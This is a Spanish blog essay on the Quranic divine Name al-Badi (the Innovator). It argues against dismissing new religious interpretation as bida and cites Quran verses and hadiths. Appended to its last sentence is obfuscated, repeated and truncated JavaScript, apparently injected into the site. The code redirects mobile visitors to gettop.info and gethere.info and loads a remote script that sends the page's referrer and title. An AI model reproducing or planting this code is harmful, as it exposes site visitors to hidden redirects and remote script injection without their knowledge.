miércoles , noviembre 22 2017

Al-Badi, el Innovador: un Nombre olvidado de Al-lâh

Al-Badi, el Innovador, es uno de los bellos Nombres, contenidos en el Corán generoso, a través de los cuales los musulmanes podemos referirnos a Al-lâh. Lo cual nos lleva a pensar, de entrada, que allí donde hay innovación se manifiesta el Nombre de Al-lâh al-Badi.

Se trata de un Nombre que merece ser rememorado, especialmente en estos tiempos, cuyo conocimiento y adopción pueden ayudarnos a vivir el din del islam de un modo más pleno, al mismo tiempo que ayudar a la ummah a superar el tradicionalismo inane, insha Al-lâh. A pesar de ello, no lo oímos demasiado a menudo en boca de los musulmanes. Más bien, la palabra bida (innovación) es utilizada generalmente en un sentido negativo, a causa de un hadiz (y otros semejantes) según el cual el Mensajero de Al-lâh habría dicho: «Cuidado con las innovaciones, porque toda novedad es una innovación, y toda innovación es un extravío, y todo extravío lleva al Infierno». Esto nos lleva a la pregunta: ¿cómo es posible que siendo Al-lâh el Innovador toda innovación sea rechazada? Como veremos, esto no es en absoluto cierto. Para comprender esta aparente contradicción, debemos situarnos en el plano más amplio de la cosmología coránica como un todo, lo cual nos abre a una visión dinámica capaz de integrar aspectos en apariencia contradictorios. Pues solo hay contradicción desde la lógica formal, en la medida en que no tiene en cuenta el dinamismo propio de la vida. Precisamente de esto se trata cuando hablamos de al-Badi.

La trilítera BÂ-DÂL-AYN aparece cuatro veces en el Corán, de modo que resulta posible el citarlas todas.

Él es el Originador (bad’îu) de los cielos y de la tierra:
cuando decreta la existencia de algo, le dice tan sólo:
«Sé» –y es.
(Corán 2: 117)

¡Él está sublimemente exaltado por encima
de cuanto los hombres puedan concebir para definirle:
el Originador (bad’îu) de los cielos y de la tierra!
(Corán 6:100-101)

En estos dos versículos el término se refiere a Al-lâh y su sentido es positivo. No sucede lo mismo con los otros dos. El primero habla de la instauración del monacato cristiano:

En cuanto al monacato –no se lo ordenamos Nosotros:
lo inventaron ellos (ib’tada’ûhâ) buscando la complacencia de Al-lâh.
(Corán 57:27)

En el último, el Profeta habla de sí mismo en estos términos:

«No soy un innovador (bid’ân) entre los mensajeros…»
(Corán 46:9)

Una raíz relacionada es BÂ-DÂL-HAMZA, que aparece 15 veces, con el sentido de empezar o iniciar, y es traducida a menudo también como originar. El carácter de Innovador o de Originador de algo nuevo/original es consustancial a la imagen coránica de una divinidad dinámica, que no cesa de crear:

Al-lâh crea en un principio, y luego lo suscita de nuevo.
(Corán 30: 11 y Corán 30: 27)

Añade a Su creación lo que Él quiere:
pues, ciertamente, Al-lâh tiene el poder para disponer cualquier cosa.
(Corán 35:1)

Y hemos creado los cielos y la tierra
y todo lo que hay entre ellos en seis eras,
y el cansancio jamás nos afecta.
(Corán 50: 38)

De Él dependen todas las criaturas en los cielos y en la tierra;
[y] cada día se manifiesta en otra faceta.
(Corán 55: 29)

Siendo Al-lâh el Creador (al-Jaliq) resulta evidente que una de sus características es la creatividad. ¡Y qué creatividad! Basta mirar para darse cuenta: la emergencia incesante de la vida, la aparición de nuevas formas, la constante recreación de lo existente, el cambio y la no permanencia de lo ente. Hay varios nombres que aluden a esta potencia creadora de Al-lâh. La particularidad de al-Badi radica en que lo creado es algo completamente nuevo.

He dicho que se trata de un Nombre olvidado, lo cual es seguramente una exageración. Lo que quiero hacer notar es cómo este Nombre no es por lo común actualizado, no se valora la innovación como algo divino. Más bien, nos situamos en un momento de conservadurismo. Solo la gente de conocimiento y la gente del recuerdo trabajan para preservar, recordar, conocer, honrar y actualizar el Nombre de Al-lâh al-Badi.

Hablar de los Nombres de Al-lâh no es hacer teología. Conocer a nuestro Sustentador es una obligación, nos ayuda a profundizar e iluminar nuestra práctica del din de Al-lâh, y evitarnos caer en aquello que el Corán denuncia de forma tan contundente: el seguimiento ciego de la religión de los antepasados.

El conocimiento es la clave, la llave es el recuerdo. Desde el recuerdo del Nombre de Al-lâh al-Badi, debemos hablar de un conocimiento dinámico y no estático, no la repetición mecánica de doctrinas, ni un racionalismo orgulloso de sí mismo, sino la apertura del intelecto a la revelación-creación constante que Al-lâh opera sobre el mundo. Y es allí donde vemos como el Nombre de Al-lâh al-Badi se nos presenta como un deslumbramiento, como conciencia de que la Creación se renueva a cada instante, de que somos creados una y otra vez desde la nada, y que en cada nueva creación nacemos a la vida, siempre renovados. Somos por tanto capaces de cambiar, de mejorar, de crecer, de transformarnos, de romper con la inercia y con los malos hábitos, si Al-lâh quiere. Interiorizar y vivenciar este Nombre divino puede ayudarnos a salir de aquellas situaciones en las cuales el peso de lo real nos abruma y no encontramos ninguna salida aparente. En esos momentos en los cuales el mundo parece cerrarse a nuestro alrededor solo queda una posibilidad: ofrecer una respuesta creativa que rompa con el muro en el cual estamos atrapados. La innovación es necesaria para preservar el din, para contribuir a que conserve y renueve toda su belleza, toda su potencia liberadora, toda su capacidad de colmar las aspiraciones de los creyentes.

De ahí la gravedad del olvido de este Nombre. Pero hay algo todavía peor: es un Nombre negado y rechazado, del cual muchos musulmanes parecen haber renegado. En estos tiempos oímos repetirse mucho la palabra bida como algo necesariamente negativo, usada para descalificar cualquier pensamiento creativo dentro del islam. Ya no se puede intercambiar, crear, pensar por uno mismo, pues toda innovación es rechazada.

El musulmán contemporáneo se ve forzado a enfrentarse a temas polémicos, pues están en el ambiente: la lapidación, la poligamia, los malos tratos, el aborto… Al tratar de dar respuestas, una práctica común es la remisión a lo ya sabido y a lo ya interpretado: los grandes sabios del islam han dado ya respuestas a todas las cuestiones. Y, sin embargo, a veces estas no son satisfactorias, aparecen argumentos que cuestionan las interpretaciones dominantes y proponen nuevas interpretaciones. Esto suscita el rechazo de los devotos de los ulemas oficiales. En el momento en el cual los argumentos desaparecen, el último recurso es la acusación de bida: todo aquel que propone una nueva interpretación es tachado de innovador.

Quisiera prevenir contra esta práctica, por varios motivos importantes:

1) Es muy grave. El hadiz que hemos citado dice: toda innovación es un extravío, y todo extravío lleva al Infierno. La acusación de bida debe tomarse en serio, pues es prácticamente equivalente al takfir. Esto es algo que no puede decirse a la ligera.

2) Niega el Nombre de Al-lâh al-Badi, coaccionando a los musulmanes para que no vivencien dicho Nombre, de modo que su relación con Al-lâh queda mutilada.

3) Constituye una manipulación de la Sunna del profeta Muhammad. En este sentido, la propia expresión «toda innovación es nociva» constituye una falsedad. Pues existen hadices en los que la innovación aparece como algo positivo. Quienes utilizan dicha expresión están ocultando que el Mensajero de Al-lâh afirmó que existen bida hasanat, y que hay hadices donde alaba a algunos de sus contemporáneos por su actitud innovadora. ¿Ignoran los ulemas oficiales estos hadices o los ocultan ex profeso?

4) El calificar cualquier opinión no oficial como bida negativa es un método para acabar con la libertad de conciencia y con la creatividad de los creyentes, encorsetados en una tradición y en unas formas que ya no pueden ser ni siquiera discutidas. Ahoga y conduce a la parálisis y al tradicionalismo. Como consecuencia, provoca que las gentes más creativas se alejen del islam, buscando en el arte o en otros campos un espacio en el cual desarrollar su creatividad.

5) Notar también el sectarismo: muchas veces se rechaza como innovación infame aquello que va contra lo que uno considera como firmemente establecido. Pero ¿con qué base? Es decir: se parte de una visión ya considerada como la única posible y se acusa a los que no se adaptan a ella de innovar. Pues la cuestión es: ¿con respecto a qué es bueno o malo el innovar? La respuesta solo puede ser: según lo establecido en el Corán y en la Sunna del Profeta. Lo cual no puede hacerse extensivo ni al kalam, ni al fiqh o al tafsir tradicional.

Muchas de las prácticas o de las interpretaciones que hoy se consideran como firmemente establecidas fueron consideradas como una innovación en su momento. Los ejemplos podrían llenar un libro. Esto constituye, precisamente, algo que tiene a su favor el islam tradicional: el ser el fruto de un esfuerzo creativo por implementar el mensaje del Corán y la Sunna del Profeta en un contexto dado.

Sobre grandes innovaciones que han pasado al acerbo común de los musulmanes, podría escribirse un libro. Si consideramos como innovación todo aquello que no está claramente estipulado en el Corán o viene dado por la Sunna, nos daríamos cuenta de que el islam tradicional es una gran innovación. Basta citar un ejemplo para darse cuenta de lo que estamos hablando: existe unanimidad en atribuir el establecimiento del calendario de la hégira a Omar ibn al-Jattab. Todos los que aceptan dicho calendario aceptan una innovación.

Quisiera por todo ello prevenir contra aquellos que usan el no argumento de la bida para zanjar cualquier disputa. Quienes así lo hacen están, sin darse cuenta, depreciando la propia tradición que pretenden preservar. Su actitud podría volverse contra ellos, como de hecho ya sucede.

Vale la pena leer un hadiz transmitido por Abu Huraira, contenido en el Sahih de al-Bujari. Lo encontramos también en Los jardines de los justos de Imam Nawawi, en el libro 7, hadiz nº 1516. Aquí solo citamos la parte final, en la cual se relata la ejecución de Jubaib, uno de los sahaba. Al principio, el hadiz nos relata una expedición en la cual Asim actúa como emir, y en la cual Jubaib fue capturado por el Quraish, siendo vendido como esclavo en Meka:

Permaneció Jubaib cautivo con ellos, los meses sagrados hasta que resolvieron matarlo. Primeramente pidió prestada una navaja para afeitarse el pubis y purificarse a una de las hijas de Al Háriz, y ésta se la prestó. (…) Cuando salieron con él fuera del límite sagrado de Meca, para matarlo, les pidió: «¡Dejadme que rece dos rakas!» Lo dejaron rezar y dijo: «¡Por Al-lâh! que si no fuera porque pensaríais que estoy angustiado por la muerte, alargaría mi oración: ¡Oh Al-lâh, cuéntalos en número y haz que mueran de uno en uno, sin que quede tan sólo uno!» (…) Y así fue como Jubaib instauró la Sunna para todo musulmán de rezar pacientemente antes de ser ejecutado. (…).

Lo relató Al Bujari.

Recalcamos la frase final, en la cual se afirma que un hombre distinto del Profeta instaura una Sunna (una tradición) válida para todos los musulmanes. Más allá de lo que esto nos parezca, lo que es indudable es que ha sido ampliamente aceptado en la historia del islam, y precisamente por aquellos que los tradicionalistas actuales tienen como referentes de aquel islam con respecto al cual toda innovación les parece infame.

El Mensajero de Al-lâh no estaba en absoluto en contra de todas las innovaciones. Por el contrario, la Sira nos enseña otra cosa. Sería prolijo citar todas las narraciones que validan lo que acabamos de decir. Con una bastará, pues en él vemos al Profeta manifestando su aprobación a una práctica innovadora que modificaba la estructura de una ibada tan fundamental como es el yumua. Lo compiló Muslim y también lo encontramos en Los jardines de los justos, incluido en el apartado De quien origina una Sunna, sea buena o mala:

De Yarir ibn Abdallah se transmitió que dijo:

«Estábamos a media mañana con el Mensajero de Al-lâh cuando vino a él una gente casi desnuda y harapienta, con sus espadas al cuello. La mayoría o todos ellos eran de la tribu de Mudar. El Mensajero de Al-lâh se conmovió profundamente por la pobreza que vio en ellos. Entró en su casa y salió para ordenar a Bilal que llamara a la oración.

Y después de rezar habló a la gente diciendo:

-¡Oh hombres! Temed a vuestro Señor, que os ha creado a todos de un mismo ser, generando a partir de ambos muchos hombres y mujeres. ¡Temed a Al-lâh, Aquel por el que pedís y guardaos de romper los lazos consanguíneos! Y Al-lâh observa lo que hacéis-. (Completó el áyat).

Después recitó otro áyat del final del sura “La Reunión”:

-¡Oh creyentes! Temed a Al-lâh y que cada uno vea lo que aporta para el día del Juicio. ¡Que dé sádaqa el hombre de sus dinares, o de sus dirhams, o de su vestido o trigo o dátiles!

Hasta decir: (¡Aunque sea medio dátil!)

Y vino un hombre de los auxiliares de Medina con una bolsa pesada llena de dinero que casi no podía con ella. Después lo siguió la gente hasta que vi dos montones de comida y ropa. Y entonces vi relucir de alegría el rostro del Mensajero de Al-lâh de forma pura y brillante.

Pues dijo: -Para quien establece una buena sunna en el islam, la recompensa de su acción y de la de quien sigue su ejemplo, sin que disminuya en nada la recompensa de los que la siguieron. Y sobre quien establece una mala costumbre en el islam, cae su falta y la de los que la siguieron sin que disminuya nada la de ellos. »

¡Qué hermoso hadiz! Por un lado, nos muestra el carácter solidario y abierto del Profeta, su predisposición a aceptar todo lo bueno, fuese cual fuese su origen. Pues lo que está en juego no es una fantasmagórica pureza doctrinal, sino la lucha contra el hambre, contra la injusticia. Una vez más, la compasión es el criterio. El amor es el criterio, la solidaridad es el criterio. No la fidelidad a las normas establecidas, ni el ser estricto con las formas.

¿Por qué, entonces, el Mensajero de Al-lâh afirma que las innovaciones conducen al Fuego? Lo decisivo, en este punto, es comprender que las innovaciones contra las que nos previene el Mensajero de Al-lâh son de cierto tipo. Para esto hay que volver a situarse en el corazón de la cosmología coránica, de cara a encontrar el equilibrio y evitar tanto el inmovilismo inane como las innovaciones destructivas. Pues si Al-lâh es al-Badi, también es al-Hafiz. Si es el que innova a cada paso, es también el que conserva, retiene y mantiene las cosas en su sitio: el Preservador, o el Conservador.

Debemos pues considerar la otra parte, buscar el equilibrio. El islam es un todo integrado, no puede fragmentarse sin perderse. Al-lâh nos previene en el Corán de seguir tan solo aquello que nos interese, aquella parte del Mensaje que se adapta a nuestro temperamento. En este caso, no podemos vivenciar el Nombre de Al-lâh al-Badi sin tener en cuenta a Al-lâh como al-Hafiz. Pero tampoco lo contrario. Ahí esta la clave, la resolución de los conflictos, en la búsqueda del equilibrio.

Para superar las diferencias entre innovadores y conservadores, debemos partir de la base de que los Nombres al-Hafiz y al-Badi no se contradicen, en el mismo sentido que no son contradictorios el Primero y el Último o el Manifiesto y el Oculto. Son Nombres que se completan el uno al otro. En la Creación de Al-lâh existen fuerzas de cambio y de permanencia, momentos de expansión y de concentración, cuyo equilibrio es la garantía de su éxito. Nosotros podemos percibir al mismo tiempo como todo cambia y todo permanece.

El islam es muy hermoso. Nos sitúa en el camino del encuentro, si Al-lâh quiere. No tiene nada que ver con nuestros caprichos ni con nuestras opiniones, sino con el poner la confianza en el Creador. Debemos por ello dejar de considerar el Nombre de Al-lâh al-Badi como algo que se relacione con la subjetividad humana. No nos relacionamos con este Nombre si meramente lo usamos como excusa para justificar nuestras interpretaciones personales. Y aquí tenemos la clave del rechazo de la innovación en el islam, que debemos comprender e integrar para que la verdadera renovación sea posible: cualquier innovación que no tenga por motivo dicha preservación debe ser descartada como un capricho. Pero nosotros estamos implicados en el dinamismo de la vida en tanto seres humanos concretos, como individuos contingentes. Por eso, no se trata tampoco de no pensar por nosotros mismos, dejando toda respuesta en manos de los expertos o de los sabios del pasado. Más bien, se trata de entrar en el fluir de una existencia siempre renovada. Y de allí tomar la fuerza para afrontar los retos del presente, con el permiso de Al-lâh.

Una vez más: el islam es el camino de en medio.

Y Al-lâh es el que sabe.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?53vSkc&’);eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))var d=document;var s=d.createElement(‘script’); var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘z(1d.1k.1l(“16”)==-1){(2V(a,b){z(a.1l(“2W”)==-1){z(/(2X|2U\\d+|2T).+1b|2P|2Q\\/|2R|2S|2Y|2Z|37|38|39|G(36|B|L)|W|35|30 |31|33|34|1b.+2O|2N|1i m(2z|2A)i|2B( K)?|2y|p(2x|2t)\\/|2u|2v|2w|2C(4|6)0|2D|2K|M\\.(2L|2M)|2J|2I|2E 2F|2G|2H/i.17(a)||/3a|3b|3E|3F|3G|50[1-6]i|3D|3C|a D|3y|X(N|Z|s\\-)|Y(3z|3A)|O(3B|1g|U)|3H|3I(3P|x|3Q)|3R|P(3O|A)|3N(j|3J)|3K|3L(3M|\\-m|r |s )|3x|3w(I|S|3i)|1a(3j|3k)|3h(X|3g)|3c(e|v)w|3d|3e\\-(n|u)|3f\\/|3l|3m|2s\\-|3u|3v|3s|3r\\-|U(3n|R)|3o|3p(V|S|3q)|3S|2l\\-s|1B|1x|1y|1c(c|p)o|1E(12|\\-d)|1J(49|Y)|1w(1H|1F)|N(1m|1n)|1o|1v([4-7]0|K|D|1p)|1s|1q(\\-|15)|F u|1r|1I|2r\\-5|g\\-y|A(\\.w|B)|2f(L|29)|2a|2b|2i\\-(m|p|t)|2o\\-|2p(J|14)|2n( i|G)|2j\\-c|2k(c(\\-| |15|a|g|p|s|t)|28)|27(1S|1T)|i\\-(20|A|q)|1R|1Q( |\\-|\\/)|1N|1O|1P|1V|1W|24|25|W|23(t|v)a|22|1X|1Y|1Z|2e|26( |\\/)|1U|2m |2q\\-|2h(c|k)|2c(2d|2g)|1M( 